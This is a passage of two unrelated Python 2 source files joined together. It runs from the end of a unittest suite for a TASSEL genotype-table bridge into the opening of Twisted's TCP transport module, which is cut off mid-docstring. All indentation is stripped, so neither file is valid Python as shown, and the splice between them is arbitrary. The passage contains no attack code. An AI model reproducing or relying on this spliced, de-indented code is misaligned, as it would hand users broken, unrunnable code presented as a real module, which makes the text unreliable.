arr = self.data.allelePresenceForSitesBlock(0,WHICH_ALLELE.Major,0,1)
self.assertIsInstance(arr,meta_long_array)
def test_haplotypeAllelePresenceForAllSites(self):
if debug: print "Testing haplotypeAllelePresenceForAllSites"
try:
bitset_major = self.data.haplotypeAllelePresenceForAllSites(0,True,WHICH_ALLELE.Major)
self.assertIsInstance(bitset_major,BitSet)
except JavaException as e:
self.assertTrue(is_instance_of(e.throwable, java_imports['UnsupportedOperationException']))
def test_haplotypeAllelePresenceForAllTaxa(self):
if debug: print "Testing haplotypeAllelePresenceForAllTaxa"
try:
bitset_major = self.data.haplotypeAllelePresenceForAllTaxa(0,True,WHICH_ALLELE.Major)
self.assertIsInstance(bitset_major,BitSet)
except JavaException as e:
self.assertTrue(is_instance_of(e.throwable, java_imports['UnsupportedOperationException']))
def test_haplotypeAllelePresenceForSitesBlock(self):
if debug: print "Testing haplotypeAllelePresenceForSitesBlock"
try:
arr = self.data.haplotypeAllelePresenceForSitesBlock(0,True,WHICH_ALLELE.Major,
0,1)
self.assertIsInstance(arr,meta_long_array)
except JavaException as e:
self.assertTrue(is_instance_of(e.throwable, java_imports['UnsupportedOperationException']))
def test_genotypeAsString(self):
if debug: print "Testing genotypeAsString"
geno1 = self.data.genotypeAsString(0,0)
geno2 = self.data.genotypeAsString(0,np.int8(0))
self.assertIsInstance(geno1,metaString)
self.assertIsInstance(geno2,metaString)
def test_genotypeAsStringRange(self):
if debug: print "Testing genotypeAsStringRange"
genos = self.data.genotypeAsStringRange(0,0,1)
self.assertIsInstance(genos,metaString)
def test_genotypeAsStringRow(self):
if debug: print "Testing genotypeAsStringRow"
genos = self.data.genotypeAsStringRow(0)
self.assertIsInstance(genos,metaString)
def test_genotypeAsStringArray(self):
if debug: print "Testing genotypeAsStringArray"
arr = self.data.genotypeAsStringArray(0,0)
self.assertIsInstance(arr[0],String)
def test_referenceAllele(self):
if debug: print "Testing referenceAllele"
ref = self.data.referenceAllele(0)
self.assertIsInstance(ref,metaByte)
def test_referenceAlleles(self):
if debug: print "Testing referenceAlleles"
arr = self.data.referenceAlleles(0,1)
self.assertIsInstance(arr,meta_byte_array)
def test_referenceAlleleForAllSites(self):
if debug: print "Testing referenceAlleleForAllSites"
arr = self.data.referenceAlleleForAllSites()
self.assertIsInstance(arr,meta_byte_array)
def test_hasReference(self):
if debug: print "Testing hasReference"
self.assertFalse(self.data.hasReference())
def test_isHeterozygous(self):
if debug: print "Testing isHeterozygous"
self.assertIsInstance(self.data.isHeterozygous(0,0),metaBoolean)
def test_heterozygousCount(self):
if debug: print "Testing heterozygousCount"
self.assertIsInstance(self.data.heterozygousCount(0),metaInteger)
def test_siteName(self):
if debug: print "Testing siteName"
self.assertIsInstance(self.data.siteName(0),metaString)
def test_chromosomeSiteCount(self):
if debug: print "Testing chromosomeSitecount"
first_site_chrom = self.data.chromosome(0)
count = self.data.chromosomeSiteCount(first_site_chrom)
self.assertIsInstance(count,metaInteger)
def test_firstLastSiteOfChromosome(self):
if debug: print "Testing firstLastSiteOfChromosome"
first_site_chrom = self.data.chromosome(0)
endpoints = self.data.firstLastSiteOfChromosome(first_site_chrom)
self.assertIsInstance(endpoints, meta_int_array)
def test_numberOfTaxa(self):
if debug: print "Testing numberOfTaxa"
self.assertIsInstance(self.data.numberOfTaxa(), metaInteger)
def test_positions(self):
if debug: print "Testing positions"
poslist = self.data.positions()
self.assertIsInstance(poslist, PositionList)
def test_chromosomalPosition(self):
if debug: print "Testing chromosomalPosition"
self.assertIsInstance(self.data.chromosomalPosition(0),metaInteger)
def test_siteOfPhysicalPosition(self):
if debug: print "Testing siteOfPhysicalPosition"
site1 = self.data.siteOfPhysicalPosition(data_constants.SHORT_HMP_FILE_FIRST_POS,
Chromosome(data_constants.SHORT_HMP_FILE_FIRST_CHROM))
site2 = self.data.siteOfPhysicalPosition(data_constants.SHORT_HMP_FILE_FIRST_POS,
Chromosome(data_constants.SHORT_HMP_FILE_FIRST_CHROM),
data_constants.SHORT_HMP_FILE_FIRST_SITENAME)
self.assertEquals(site1,0)
self.assertEqual(site1,site2)
def test_physicalPosition(self):
if debug: print "Testing physicalPositions"
positions = self.data.physicalPositions()
self.assertIsInstance(positions, meta_int_array)
def test_chromosomeName(self):
if debug: print "Testing chromosomeName"
self.assertEquals(self.data.chromosomeName(0), data_constants.SHORT_HMP_FILE_FIRST_CHROM)
def test_chromosome(self):
if debug: print "Testing chromosome"
chrom1 = self.data.chromosome(0)
chrom2 = self.data.chromosome(data_constants.SHORT_HMP_FILE_FIRST_CHROM)
self.assertEquals(chrom1.getName(), data_constants.SHORT_HMP_FILE_FIRST_CHROM)
self.assertEqual(chrom1,chrom2)
def test_chromosomes(self):
if debug: print "Testing chromosomes"
chroms = self.data.chromosomes()
self.assertIsInstance(chroms,javaArray)
self.assertIsInstance(chroms[0], Chromosome)
def test_numChromosomes(self):
if debug: print "Testing numChromosomes"
self.assertIsInstance(self.data.numChromosomes(),metaInteger)
def test_chromosomesOffsets(self):
if debug: print "Testing chromosomesOffsets"
arr = self.data.chromosomesOffsets()
self.assertIsInstance(arr,meta_int_array)
def test_hasDepth(self):
if debug: print "Testing hasDepth"
self.assertIsInstance(self.data.hasDepth(),metaBoolean)
def test_hasAlleleProbabilities(self):
if debug: print("Testing hasAlleleProbabilities")
self.assertFalse(self.data.hasAlleleProbabilities())
def test_indelSize(self):
if debug: print "Testing indelSize"
self.assertIsInstance(self.data.indelSize(0),metaInteger)
def test_isIndel(self):
if debug: print "Testing isIndel"
self.assertIsInstance(self.data.isIndel(0),metaBoolean)
def test_isAllPolymorphic(self):
if debug: print "Testing isAllPolymorphic"
self.assertIsInstance(self.data.isAllPolymorphic(),metaBoolean)
def test_isPolymorphic(self):
if debug: print "Testing isPolymorphic"
self.assertIsInstance(self.data.isPolymorphic(0),metaBoolean)
def test_majorAllele(self):
if debug: print "Testing majorAllele"
self.assertIsInstance(self.data.majorAllele(0),metaByte)
def test_majorAlleleAsString(self):
if debug: print "Testing majorAlleleAsString"
self.assertIsInstance(self.data.majorAlleleAsString(0),metaString)
def test_minorAllele(self):
if debug: print "Testing minorAllele"
self.assertIsInstance(self.data.minorAllele(0),metaByte)
def test_minorAlleleAsString(self):
if debug: print "Testing minorAlleleAsString"
self.assertIsInstance(self.data.minorAlleleAsString(0),metaString)
def test_minorAlleles(self):
if debug: print "Testing minorAlleles"
self.assertIsInstance(self.data.minorAlleles(0),meta_byte_array)
def test_alleles(self):
if debug: print "Testing alleles"
self.assertIsInstance(self.data.alleles(0), meta_byte_array)
def test_minorAlleleFrequency(self):
if debug: print "Testing minorAlleleFrequency"
self.assertIsInstance(self.data.minorAlleleFrequency(0),metaDouble)
def test_majorAlleleFrequency(self):
if debug: print "Testing majorAlleleFrequency"
self.assertIsInstance(self.data.majorAlleleFrequency(0),metaDouble)
def test_taxa(self):
if debug: print "Testing taxa"
taxa = self.data.taxa()
self.assertIsInstance(taxa, TaxaList)
def test_taxaName(self):
if debug: print "Testing taxaName"
self.assertIsInstance(self.data.taxaName(0), metaString)
def test_genomeVersion(self):
if debug: print "Testing genomeVersion"
try:
version = self.data.genomeVersion()
if version is not None:
self.assertIsInstance(version, metaString)
except JavaException as e:
self.assertTrue(is_instance_of(e.throwable, java_imports['UnsupportedOperationException']))
def test_isPositiveStrand(self):
if debug: print "Testing isPositiveStrand"
self.assertIsInstance(self.data.isPositiveStrand(0),metaBoolean)
def test_compositeAlignments(self):
if debug: print "Testing compositeAlignments"
alns = self.data.compositeAlignments()
exp_arr_type = javaArray.get_array_type(GenotypeTable)
self.assertIsInstance(alns, exp_arr_type)
def test_allelesSortedByFrequency(self):
if debug: print "Testing allelesSortedByFrequency"
arr = self.data.allelesSortedByFrequency(0)
exp_arr_type = javaArray.get_array_type(javaPrimativeArray.get_array_type('int'))
self.assertIsInstance(arr,exp_arr_type)
def test_genosSortedByFrequency(self):
if debug: print "Testing genosSortedByFrequency"
arr = self.data.genosSortedByFrequency(0)
self.assertIsInstance(arr[0][0],metaString)
self.assertIsInstance(arr[1][0],metaInteger)
def test_isPhased(self):
if debug: print "Testing isPhased"
self.assertIsInstance(self.data.isPhased(),metaBoolean)
def test_retainsRareAlleles(self):
if debug: print "Testing retainsRareAlleles"
self.assertIsInstance(self.data.retainsRareAlleles(),metaBoolean)
def test_alleleDefinitions(self):
if debug: print "Testing alleleDefinitions"
arr1 = self.data.alleleDefinitions()
arr2 = self.data.alleleDefinitions(0)
self.assertIsInstance(arr1[0][0], metaString)
self.assertEqual(arr1[0][0], arr2[0])
def test_diploidAsString(self):
if debug: print "Testing diploidAsString"
val = self.data.diploidAsString(0,np.int8(0))
self.assertIsInstance(val,metaString)
def test_maxNumAlleles(self):
if debug: print "Testing maxNumAlleles"
self.assertIsInstance(self.data.maxNumAlleles(), metaInteger)
def test_totalGametesNonMissingForSites(self):
if debug: print "Testing totalGametesNonMissingForSite"
self.assertIsInstance(self.data.totalGametesNonMissingForSite(0), metaInteger)
def test_totalNonMissingForSite(self):
if debug: print "Testing totalNonMissingForSite"
self.assertIsInstance(self.data.totalNonMissingForSite(0), metaInteger)
def test_minorAlleleCount(self):
if debug: print "Testing minorAlleleCount"
self.assertIsInstance(self.data.minorAlleleCount(0), metaInteger)
def test_majorAlleleCount(self):
if debug: print "Testing majorAlleleCount"
self.assertIsInstance(self.data.majorAlleleCount(0), metaInteger)
def test_genoCount(self):
if debug: print "Testing genoCount"
arr = self.data.genoCounts()
self.assertIsInstance(arr[0][0], metaString)
self.assertIsInstance(arr[1][0], metaLong)
def test_majorMinorCounts(self):
if debug: print "Testing majorMinorCounts"
arr = self.data.majorMinorCounts()
self.assertIsInstance(arr[0][0], metaString)
self.assertIsInstance(arr[1][0], metaLong)
def test_totalGametesNonMissingForTaxon(self):
if debug: print "Testing totalGametesNonMissingForTaxon"
val = self.data.totalGametesNonMissingForTaxon(0)
self.assertIsInstance(val, metaInteger)
def test_heterozygousCountForTaxon(self):
if debug: print "Testing heterozygousCountForTaxon"
val = self.data.heterozygousCountForTaxon(0)
self.assertIsInstance(val, metaInteger)
def test_totalNonMissingForTaxon(self):
if debug: print "Testing totalNonMissingForTaxon"
val = self.data.totalNonMissingForTaxon(0)
self.assertIsInstance(val, metaInteger)
def test_depth(self):
if debug: print "Testing depth"
depth = self.data.depth()
self.assertTrue(depth is None or isinstance(depth, AlleleDepth))
def test_depthForAlleles(self):
if debug: print "Testing depthForAlleles"
try:
arr = self.data.depthForAlleles(0,0)
self.assertIsInstance(arr[0],metaInteger)
except JavaException as e:
self.assertTrue(is_instance_of(e.throwable, java_imports['NullPointerException']))
def test_allelesBySortType(self):
if debug: print "Testing allelesBySortType"
arr = self.data.allelesBySortType(self.data.ALLELE_SORT_TYPE.Reference,0)
self.assertTrue(arr is None or isinstance(arr, meta_byte_array))
def test_allelePresenceForAllTaxa(self):
if debug: print "Testing allelePresenceForAllTaxa"
bitset = self.data.allelePresenceForAllTaxa(0, WHICH_ALLELE.Major)
self.assertIsInstance(bitset, BitSet)
if __name__ == "__main__":
debug = True
unittest.main()
TASSELbridge.stop()
| |
# -*- test-case-name: twisted.test.test_tcp -*-
# Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Various asynchronous TCP/IP classes.
End users shouldn't use this module directly - use the reactor APIs instead.
Maintainer: Itamar Shtull-Trauring
"""
# System Imports
import os
import types
import socket
import sys
import operator
from zope.interface import implements, classImplements
try:
from OpenSSL import SSL
except ImportError:
SSL = None
from twisted.python.runtime import platformType
if platformType == 'win32':
# no such thing as WSAEPERM or error code 10001 according to winsock.h or MSDN
EPERM = object()
from errno import WSAEINVAL as EINVAL
from errno import WSAEWOULDBLOCK as EWOULDBLOCK
from errno import WSAEINPROGRESS as EINPROGRESS
from errno import WSAEALREADY as EALREADY
from errno import WSAECONNRESET as ECONNRESET
from errno import WSAEISCONN as EISCONN
from errno import WSAENOTCONN as ENOTCONN
from errno import WSAEINTR as EINTR
from errno import WSAENOBUFS as ENOBUFS
from errno import WSAEMFILE as EMFILE
# No such thing as WSAENFILE, either.
ENFILE = object()
# Nor ENOMEM
ENOMEM = object()
EAGAIN = EWOULDBLOCK
from errno import WSAECONNRESET as ECONNABORTED
from twisted.python.win32 import formatError as strerror
else:
from errno import EPERM
from errno import EINVAL
from errno import EWOULDBLOCK
from errno import EINPROGRESS
from errno import EALREADY
from errno import ECONNRESET
from errno import EISCONN
from errno import ENOTCONN
from errno import EINTR
from errno import ENOBUFS
from errno import EMFILE
from errno import ENFILE
from errno import ENOMEM
from errno import EAGAIN
from errno import ECONNABORTED
from os import strerror
from errno import errorcode
# Twisted Imports
from twisted.internet import base, address, fdesc
from twisted.internet.task import deferLater
from twisted.python import log, failure, reflect
from twisted.python.util import unsignedID
from twisted.internet.error import CannotListenError
from twisted.internet import abstract, main, interfaces, error
class _SocketCloser(object):
_socketShutdownMethod = 'shutdown'
def _closeSocket(self):
# socket.close() doesn't *really* close if there's another reference
# to it in the TCP/IP stack, e.g. if it was was inherited by a
# subprocess. And we really do want to close the connection. So we
# use shutdown() instead, and then close() in order to release the
# filedescriptor.
skt = self.socket
try:
getattr(skt, self._socketShutdownMethod)(2)
except socket.error:
pass
try:
skt.close()
except socket.error:
pass
class _TLSMixin:
_socketShutdownMethod = 'sock_shutdown'
writeBlockedOnRead = 0
readBlockedOnWrite = 0
_userWantRead = _userWantWrite = True
def getPeerCertificate(self):
return self.socket.get_peer_certificate()
def doRead(self):
if self.disconnected:
# See the comment in the similar check in doWrite below.
# Additionally, in order for anything other than returning
# CONNECTION_DONE here to make sense, it will probably be necessary
# to implement a way to switch back to TCP from TLS (actually, if
# we did something other than return CONNECTION_DONE, that would be
# a big part of implementing that feature). In other words, the
# expectation is that doRead will be called when self.disconnected
# is True only when the connection has been lost. It's possible
# that the other end could stop speaking TLS and then send us some
# non-TLS data. We'll end up ignoring that data and dropping the
# connection. There's no unit tests for this check in the cases
# where it makes a difference. The test suite only hits this
# codepath when it would have otherwise hit the SSL.ZeroReturnError
# exception handler below, which has exactly the same behavior as
# this conditional. Maybe that's the only case that can ever be
# triggered, I'm not sure. -exarkun
return main.CONNECTION_DONE
if self.writeBlockedOnRead:
self.writeBlockedOnRead = 0
self._resetReadWrite()
try:
return Connection.doRead(self)
except SSL.ZeroReturnError:
return main.CONNECTION_DONE
except SSL.WantReadError:
return
except SSL.WantWriteError:
self.readBlockedOnWrite = 1
Connection.startWriting(self)
Connection.stopReading(self)
return
except SSL.SysCallError, (retval, desc):
if ((retval == -1 and desc == 'Unexpected EOF')
or retval > 0):
return main.CONNECTION_LOST
log.err()
return main.CONNECTION_LOST
except SSL.Error, e:
return e
def doWrite(self):
# Retry disconnecting
if self.disconnected:
# This case is triggered when "disconnected" is set to True by a
# call to _postLoseConnection from FileDescriptor.doWrite (to which
# we upcall at the end of this overridden version of that API). It
# means that while, as far as any protocol connected to this
# transport is concerned, the connection no longer exists, the
# connection *does* actually still exist. Instead of closing the
# connection in the overridden _postLoseConnection, we probably
# tried (and failed) to send a TLS close alert. The TCP connection
# is still up and we're waiting for the socket to become writeable
# enough for the TLS close alert to actually be sendable. Only
# then will the connection actually be torn down. -exarkun
return self._postLoseConnection()
if self._writeDisconnected:
return self._closeWriteConnection()
if self.readBlockedOnWrite:
self.readBlockedOnWrite = 0
self._resetReadWrite()
return Connection.doWrite(self)
def writeSomeData(self, data):
try:
return Connection.writeSomeData(self, data)
except SSL.WantWriteError:
return 0
except SSL.WantReadError:
self.writeBlockedOnRead = 1
Connection.stopWriting(self)
Connection.startReading(self)
return 0
except SSL.ZeroReturnError:
return main.CONNECTION_LOST
except SSL.SysCallError, e:
if e[0] == -1 and data == "":
# errors when writing empty strings are expected
# and can be ignored
return 0
else:
return main.CONNECTION_LOST
except SSL.Error, e:
return e
def _postLoseConnection(self):
"""
Gets called after loseConnection(), after buffered data is sent.
We try to send an SSL shutdown alert, but if it doesn't work, retry
when the socket is writable.
"""
# Here, set "disconnected" to True to trick higher levels into thinking
# the connection is really gone. It's not, and we're not going to
# close it yet. Instead, we'll try to send a TLS close alert to shut
# down the TLS connection cleanly. Only after we actually get the
# close alert into the socket will we disconnect the underlying TCP
# connection.
self.disconnected = True
if hasattr(self.socket, 'set_shutdown'):
# If possible, mark the state of the TLS connection as having
# already received a TLS close alert from the peer. Why do
# this???
self.socket.set_shutdown(SSL.RECEIVED_SHUTDOWN)
return self._sendCloseAlert()
def _sendCloseAlert(self):
# Okay, *THIS* is a bit complicated.
# Basically, the issue is, OpenSSL seems to not actually return
# errors from SSL_shutdown. Therefore, the only way to
# determine if the close notification has been sent is by
# SSL_shutdown returning "done". However, it will not claim it's
# done until it's both sent *and* received a shutdown notification.
# I don't actually want to wait for a received shutdown
# notification, though, so, I have to set RECEIVED_SHUTDOWN
# before calling shutdown. Then, it'll return True once it's
# *SENT* the shutdown.
# However, RECEIVED_SHUTDOWN can't be left set, because then
# reads will fail, breaking half close.
# Also, since shutdown doesn't report errors, an empty write call is
# done first, to try to detect if the connection has gone away.
# (*NOT* an SSL_write call, because that fails once you've called
# shutdown)
try:
os.write(self.socket.fileno(), '')
except OSError, se:
if se.args[0] in (EINTR, EWOULDBLOCK, ENOBUFS):
return 0
# Write error, socket gone
return main.CONNECTION_LOST
try:
if hasattr(self.socket, 'set_shutdown'):
laststate = self.socket.get_shutdown()
self.socket.set_shutdown(laststate | SSL.RECEIVED_SHUTDOWN)
done = self.socket.shutdown()
if not (laststate & SSL.RECEIVED_SHUTDOWN):
self.socket.set_shutdown(SSL.SENT_SHUTDOWN)
else:
#warnings.warn("SSL connection shutdown possibly unreliable, "
# "please upgrade to ver 0.XX", category=UserWarning)
self.socket.shutdown()
done = True
except SSL.Error, e:
return e
if done:
self.stopWriting()
# Note that this is tested for by identity below.
return main.CONNECTION_DONE
else:
# For some reason, the close alert wasn't sent. Start writing
# again so that we'll get another chance to send it.
self.startWriting()
# On Linux, select will sometimes not report a closed file
# descriptor in the write set (in particular, it seems that if a
# send() fails with EPIPE, the socket will not appear in the write
# set). The shutdown call above (which calls down to SSL_shutdown)
# may have swallowed a write error. Therefore, also start reading
# so that if the socket is closed we will notice. This doesn't
# seem to be a problem for poll (because poll reports errors
# separately) or with select on BSD (presumably because, unlike
# Linux, it doesn't implement select in terms of poll and then map
# POLLHUP to select's in fd_set).
self.startReading()
return None
def _closeWriteConnection(self):
result = self._sendCloseAlert()
if result is main.CONNECTION_DONE:
return Connection._closeWriteConnection(self)
return result
def startReading(self):
self._userWantRead = True
if not self.readBlockedOnWrite:
return Connection.startReading(self)
def stopReading(self):
self._userWantRead = False
if not self.writeBlockedOnRead:
return Connection.stopReading(self)
def startWriting(self):
self._userWantWrite = True
if not self.writeBlockedOnRead:
return Connection.startWriting(self)
def stopWriting(self):
self._userWantWrite = False
if not self.readBlockedOnWrite:
return Connection.stopWriting(self)
def _resetReadWrite(self):
# After changing readBlockedOnWrite or writeBlockedOnRead,
# call this to reset the state to what the user requested.
if self._userWantWrite:
self.startWriting()
else:
self.stopWriting()
if self._userWantRead:
self.startReading()
else:
self.stopReading()
class _TLSDelayed(object):
"""
State tracking record for TLS startup parameters. Used to remember how
TLS should be started when starting it is delayed to wait for the output
buffer to be flushed.
@ivar bufferedData: A C{list} which contains all the data which was
written to the transport after an attempt to start TLS was made but
before the buffers outstanding at that time could be flushed and TLS
could really be started. This is appended to by the transport's
write and writeSequence methods until it is possible to actually
start TLS, then it is written to the TLS-enabled transport.
@ivar context: An SSL context factory object to use to start TLS.
@ivar extra: An extra argument to pass to the transport's C{startTLS}
method.
"""
def __init__(self, bufferedData, context, extra):
self.bufferedData = bufferedData
self.context = context
self.extra = extra
def _getTLSClass(klass, _existing={}):
if klass not in _existing:
class TLSConnection(_TLSMixin, klass):
implements(interfaces.ISSLTransport)
_existing[klass] = TLSConnection
return _existing[klass]
class Connection(abstract.FileDescriptor, _SocketCloser):
"""
Superclass of all socket-based FileDescriptors.
This is an abstract superclass of all objects which represent a TCP/IP
connection based socket.
@ivar logstr: prefix used when logging events related to this connection.
@type logstr: C{str}
"""
implements(interfaces.ITCPTransport, interfaces.ISystemHandle)
TLS = 0
def __init__(self, skt, protocol, reactor=None):
abstract.FileDescriptor.__init__(self, reactor=reactor)
self.socket = skt
self.socket.setblocking(0)
self.fileno = skt.fileno
self.protocol = protocol
if SSL:
_tlsWaiting = None
def startTLS(self, ctx, extra):
assert not self.TLS
if self.dataBuffer or self._tempDataBuffer:
# pre-TLS bytes are still being written. Starting TLS now
# will do the wrong thing. Instead, mark that we're trying
# to go into the TLS state.
self._tlsWaiting = _TLSDelayed([], ctx, extra)
return False
self.stopReading()
self.stopWriting()
self._startTLS()
self.socket = SSL.Connection(ctx.getContext(), self.socket)
self.fileno = self.socket.fileno
self.startReading()
return True
def _startTLS(self):
self.TLS = 1
self.__class__ = _getTLSClass(self.__class__)
def write(self, bytes):
if self._tlsWaiting is not None:
self._tlsWaiting.bufferedData.append(bytes)
else:
abstract.FileDescriptor.write(self, bytes)
def writeSequence(self, iovec):
if self._tlsWaiting is not None:
self._tlsWaiting.bufferedData.extend(iovec)
else:
abstract.FileDescriptor.writeSequence(self, iovec)
def doWrite(self):
result = abstract.FileDescriptor.doWrite(self)
if self._tlsWaiting is not None:
if not self.dataBuffer and not self._tempDataBuffer:
waiting = self._tlsWaiting
self._tlsWaiting = None
self.startTLS(waiting.context, waiting.extra)
self.writeSequence(waiting.bufferedData)
return result
def getHandle(self):
"""Return the socket for this connection."""
return self.socket
def doRead(self):
"""Calls self.protocol.dataReceived with all available data.
This reads up to self.bufferSize bytes of data from its socket, then
calls self.dataReceived(data) to process it. If the connection is not
lost through an error in the physical recv(), this function will return
the result of the dataReceived call.
"""
try:
data = self.socket.recv(self.bufferSize)
except socket.error, se:
if se.args[0] == EWOULDBLOCK:
return
else:
return main.CONNECTION_LOST
if not data:
return main.CONNECTION_DONE
return self.protocol.dataReceived(data)
def writeSomeData(self, data):
"""
Write as much as possible of the given data to this TCP connection.
This sends up to C{self.SEND_LIMIT} bytes from C{data}. If the
connection is lost, an exception is returned. Otherwise, the number
of bytes successfully written is returned.
"""
try:
# Limit length of buffer to try to send, because some OSes are too
# stupid to do so themselves (ahem windows)
return self.socket.send(buffer(data, 0, self.SEND_LIMIT))
except socket.error, se:
if se.args[0] == EINTR:
return self.writeSomeData(data)
elif se.args[0] in (EWOULDBLOCK, ENOBUFS):
return 0
else:
return main.CONNECTION_LOST
def _closeWriteConnection(self):
try:
getattr(self.socket, self._socketShutdownMethod)(1)
except socket.error:
pass
p = interfaces.IHalfCloseableProtocol(self.protocol, None)
if p:
try:
p.writeConnectionLost()
except:
f = failure.Failure()
log.err()
self.connectionLost(f)
def readConnectionLost(self, reason):
p = interfaces.IHalfCloseableProtocol(self.protocol, None)
if p:
try:
p.readConnectionLost()
except:
log.err()
self.connectionLost(failure.Failure())
else:
self.connectionLost(reason)
def connectionLost(self, reason):
"""See abstract.FileDescriptor.connectionLost().
"""
abstract.FileDescriptor.connectionLost(self, reason)
self._closeSocket()
protocol = self.protocol
del self.protocol
del self.socket
del self.fileno
protocol.connectionLost(reason)
logstr = "Uninitialized"
def logPrefix(self):
"""Return the prefix to log with when I own the logging thread.
"""
return self.logstr
def getTcpNoDelay(self):
return operator.truth(self.socket.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY))
def setTcpNoDelay(self, enabled):
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, enabled)
def getTcpKeepAlive(self):
return operator.truth(self.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_KEEPALIVE))
def setTcpKeepAlive(self, enabled):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, enabled)
if SSL:
classImplements(Connection, interfaces.ITLSTransport)
class BaseClient(Connection):
"""A base class for client TCP (and similiar) sockets.
"""
addressFamily = socket.AF_INET
socketType = socket.SOCK_STREAM
def _finishInit(self, whenDone, skt, error, reactor):
"""Called by base classes to continue to next stage of initialization."""
if whenDone:
Connection.__init__(self, skt, None, reactor)
self.doWrite = self.doConnect
self.doRead = self.doConnect
reactor.callLater(0, whenDone)
else:
reactor.callLater(0, self.failIfNotConnected, error)
def startTLS(self, ctx, client=1):
if Connection.startTLS(self, ctx, client):
if client:
self.socket.set_connect_state()
else:
self.socket.set_accept_state()
def stopConnecting(self):
"""Stop attempt to connect."""
self.failIfNotConnected(error.UserError())
def failIfNotConnected(self, err):
"""
Generic method called when the attemps to connect failed. It basically
cleans everything it can: call connectionFailed, stop read and write,
delete socket related members.
"""
if (self.connected or self.disconnected or
not hasattr(self, "connector")):
return
self.connector.connectionFailed(failure.Failure(err))
if hasattr(self, "reactor"):
# this doesn't happen if we failed in __init__
self.stopReading()
self.stopWriting()
del self.connector
try:
self._closeSocket()
except AttributeError:
pass
else:
del self.socket, self.fileno
def createInternetSocket(self):
"""(internal) Create a non-blocking socket using
self.addressFamily, self.socketType.
"""
s = socket.socket(self.addressFamily, self.socketType)
s.setblocking(0)
fdesc._setCloseOnExec(s.fileno())
return s
def resolveAddress(self):
if abstract.isIPAddress(self.addr[0]):
self._setRealAddress(self.addr[0])
else:
d = self.reactor.resolve(self.addr[0])
d.addCallbacks(self._setRealAddress, self.failIfNotConnected)
def _setRealAddress(self, address):
self.realAddress = (address, self.addr[1])
self.doConnect()
def doConnect(self):
"""I connect the socket.
Then, call the protocol's makeConnection, and start waiting for data.
"""
if not hasattr(self, "connector"):
# this happens when connection failed but doConnect
# was scheduled via a callLater in self._finishInit
return
err = self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err:
self.failIfNotConnected(error.getConnectError((err, strerror(err))))
return
# doConnect gets called twice. The first time we actually need to
# start the connection attempt. The second time we don't really
# want to (SO_ERROR above will have taken care of any errors, and if
# it reported none, the mere fact that doConnect was called again is
# sufficient to indicate that the connection has succeeded), but it
# is not /particularly/ detrimental to do so. This should get
# cleaned up some day, though.
try:
connectResult = self.socket.connect_ex(self.realAddress)
except socket.error, se:
connectResult = se.args[0]
if connectResult:
if connectResult == EISCONN:
pass
# on Windows EINVAL means sometimes that we should keep trying:
# http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winsock/winsock/connect_2.asp
elif ((connectResult in (EWOULDBLOCK, EINPROGRESS, EALREADY)) or
(connectResult == EINVAL and platformType == "win32")):
self.startReading()
self.startWriting()
return
else:
self.failIfNotConnected(error.getConnectError((connectResult, strerror(connectResult))))
return
# If I have reached this point without raising or returning, that means
# that the socket is connected.
del self.doWrite
del self.doRead
# we first stop and then start, to reset any references to the old doRead
self.stopReading()
self.stopWriting()
self._connectDone()
def _connectDone(self):
self.protocol = self.connector.buildProtocol(self.getPeer())
self.connected = 1
self.logstr = self.protocol.__class__.__name__ + ",client"
self.startReading()
self.protocol.makeConnection(self)
def connectionLost(self, reason):
if not self.connected:
self.failIfNotConnected(error.ConnectError(string=reason))
else:
Connection.connectionLost(self, reason)
self.connector.connectionLost(reason)
class Client(BaseClient):
"""A TCP client."""
def __init__(self, host, port, bindAddress, connector, reactor=None):
# BaseClient.__init__ is invoked later
self.connector = connector
self.addr = (host, port)
whenDone = self.resolveAddress
err = None
skt = None
try:
skt = self.createInternetSocket()
except socket.error, se:
err = error.ConnectBindError(se[0], se[1])
whenDone = None
if whenDone and bindAddress is not None:
try:
skt.bind(bindAddress)
except socket.error, se:
err = error.ConnectBindError(se[0], se[1])
whenDone = None
self._finishInit(whenDone, skt, err, reactor)
def getHost(self):
"""Returns an IPv4Address.
This indicates the address from which I am connecting.
"""
return address.IPv4Address('TCP', *(self.socket.getsockname() + ('INET',)))
def getPeer(self):
"""Returns an IPv4Address.
This indicates the address that I am connected to.
"""
return address.IPv4Address('TCP', *(self.realAddress + ('INET',)))
def __repr__(self):
s = '<%s to %s at %x>' % (self.__class__, self.addr, unsignedID(self))
return s
class Server(Connection):
"""
Serverside socket-stream connection class.
This is a serverside network connection transport; a socket which came from
an accept() on a server.
"""
def __init__(self, sock, protocol, client, server, sessionno, reactor):
"""
Server(sock, protocol, client, server, sessionno)
Initialize it with a socket, a protocol, a descriptor for my peer (a
tuple of host, port describing the other end of the connection), an
instance of Port, and a session number.
"""
Connection.__init__(self, sock, protocol, reactor)
self.server = server
self.client = client
self.sessionno = sessionno
self.hostname = client[0]
self.logstr = "%s,%s,%s" % (self.protocol.__class__.__name__,
sessionno,
self.hostname)
self.repstr = "<%s #%s on %s>" % (self.protocol.__class__.__name__,
self.sessionno,
self.server._realPortNumber)
self.startReading()
self.connected = 1
def __repr__(self):
"""A string representation of this connection.
"""
return self.repstr
def startTLS(self, ctx, server=1):
if Connection.startTLS(self, ctx, server):
if server:
self.socket.set_accept_state()
else:
self.socket.set_connect_state()
def getHost(self):
"""Returns an IPv4Address.
This indicates the server's address.
"""
return address.IPv4Address('TCP', *(self.socket.getsockname() + ('INET',)))
def getPeer(self):
"""Returns an IPv4Address.
This indicates the client's address.
"""
return address.IPv4Address('TCP', *(self.client + ('INET',)))
class Port(base.BasePort, _SocketCloser):
"""
A TCP server port, listening for connections.
When a connection is accepted, this will call a factory's buildProtocol
with the incoming address as an argument, according to the specification
described in L{twisted.internet.interfaces.IProtocolFactory}.
If you wish to change the sort of transport that will be used, the
C{transport} attribute will be called with the signature expected for
C{Server.__init__}, so it can be replaced.
@ivar deferred: a deferred created when L{stopListening} is called, and
that will fire when connection is lost. This is not to be used it
directly: prefer the deferred returned by L{stopListening} instead.
@type deferred: L{defer.Deferred}
@ivar disconnecting: flag indicating that the L{stopListening} method has
been called and that no connections should be accepted anymore.
@type disconnecting: C{bool}
@ivar connected: flag set once the listen has successfully been called on
the socket.
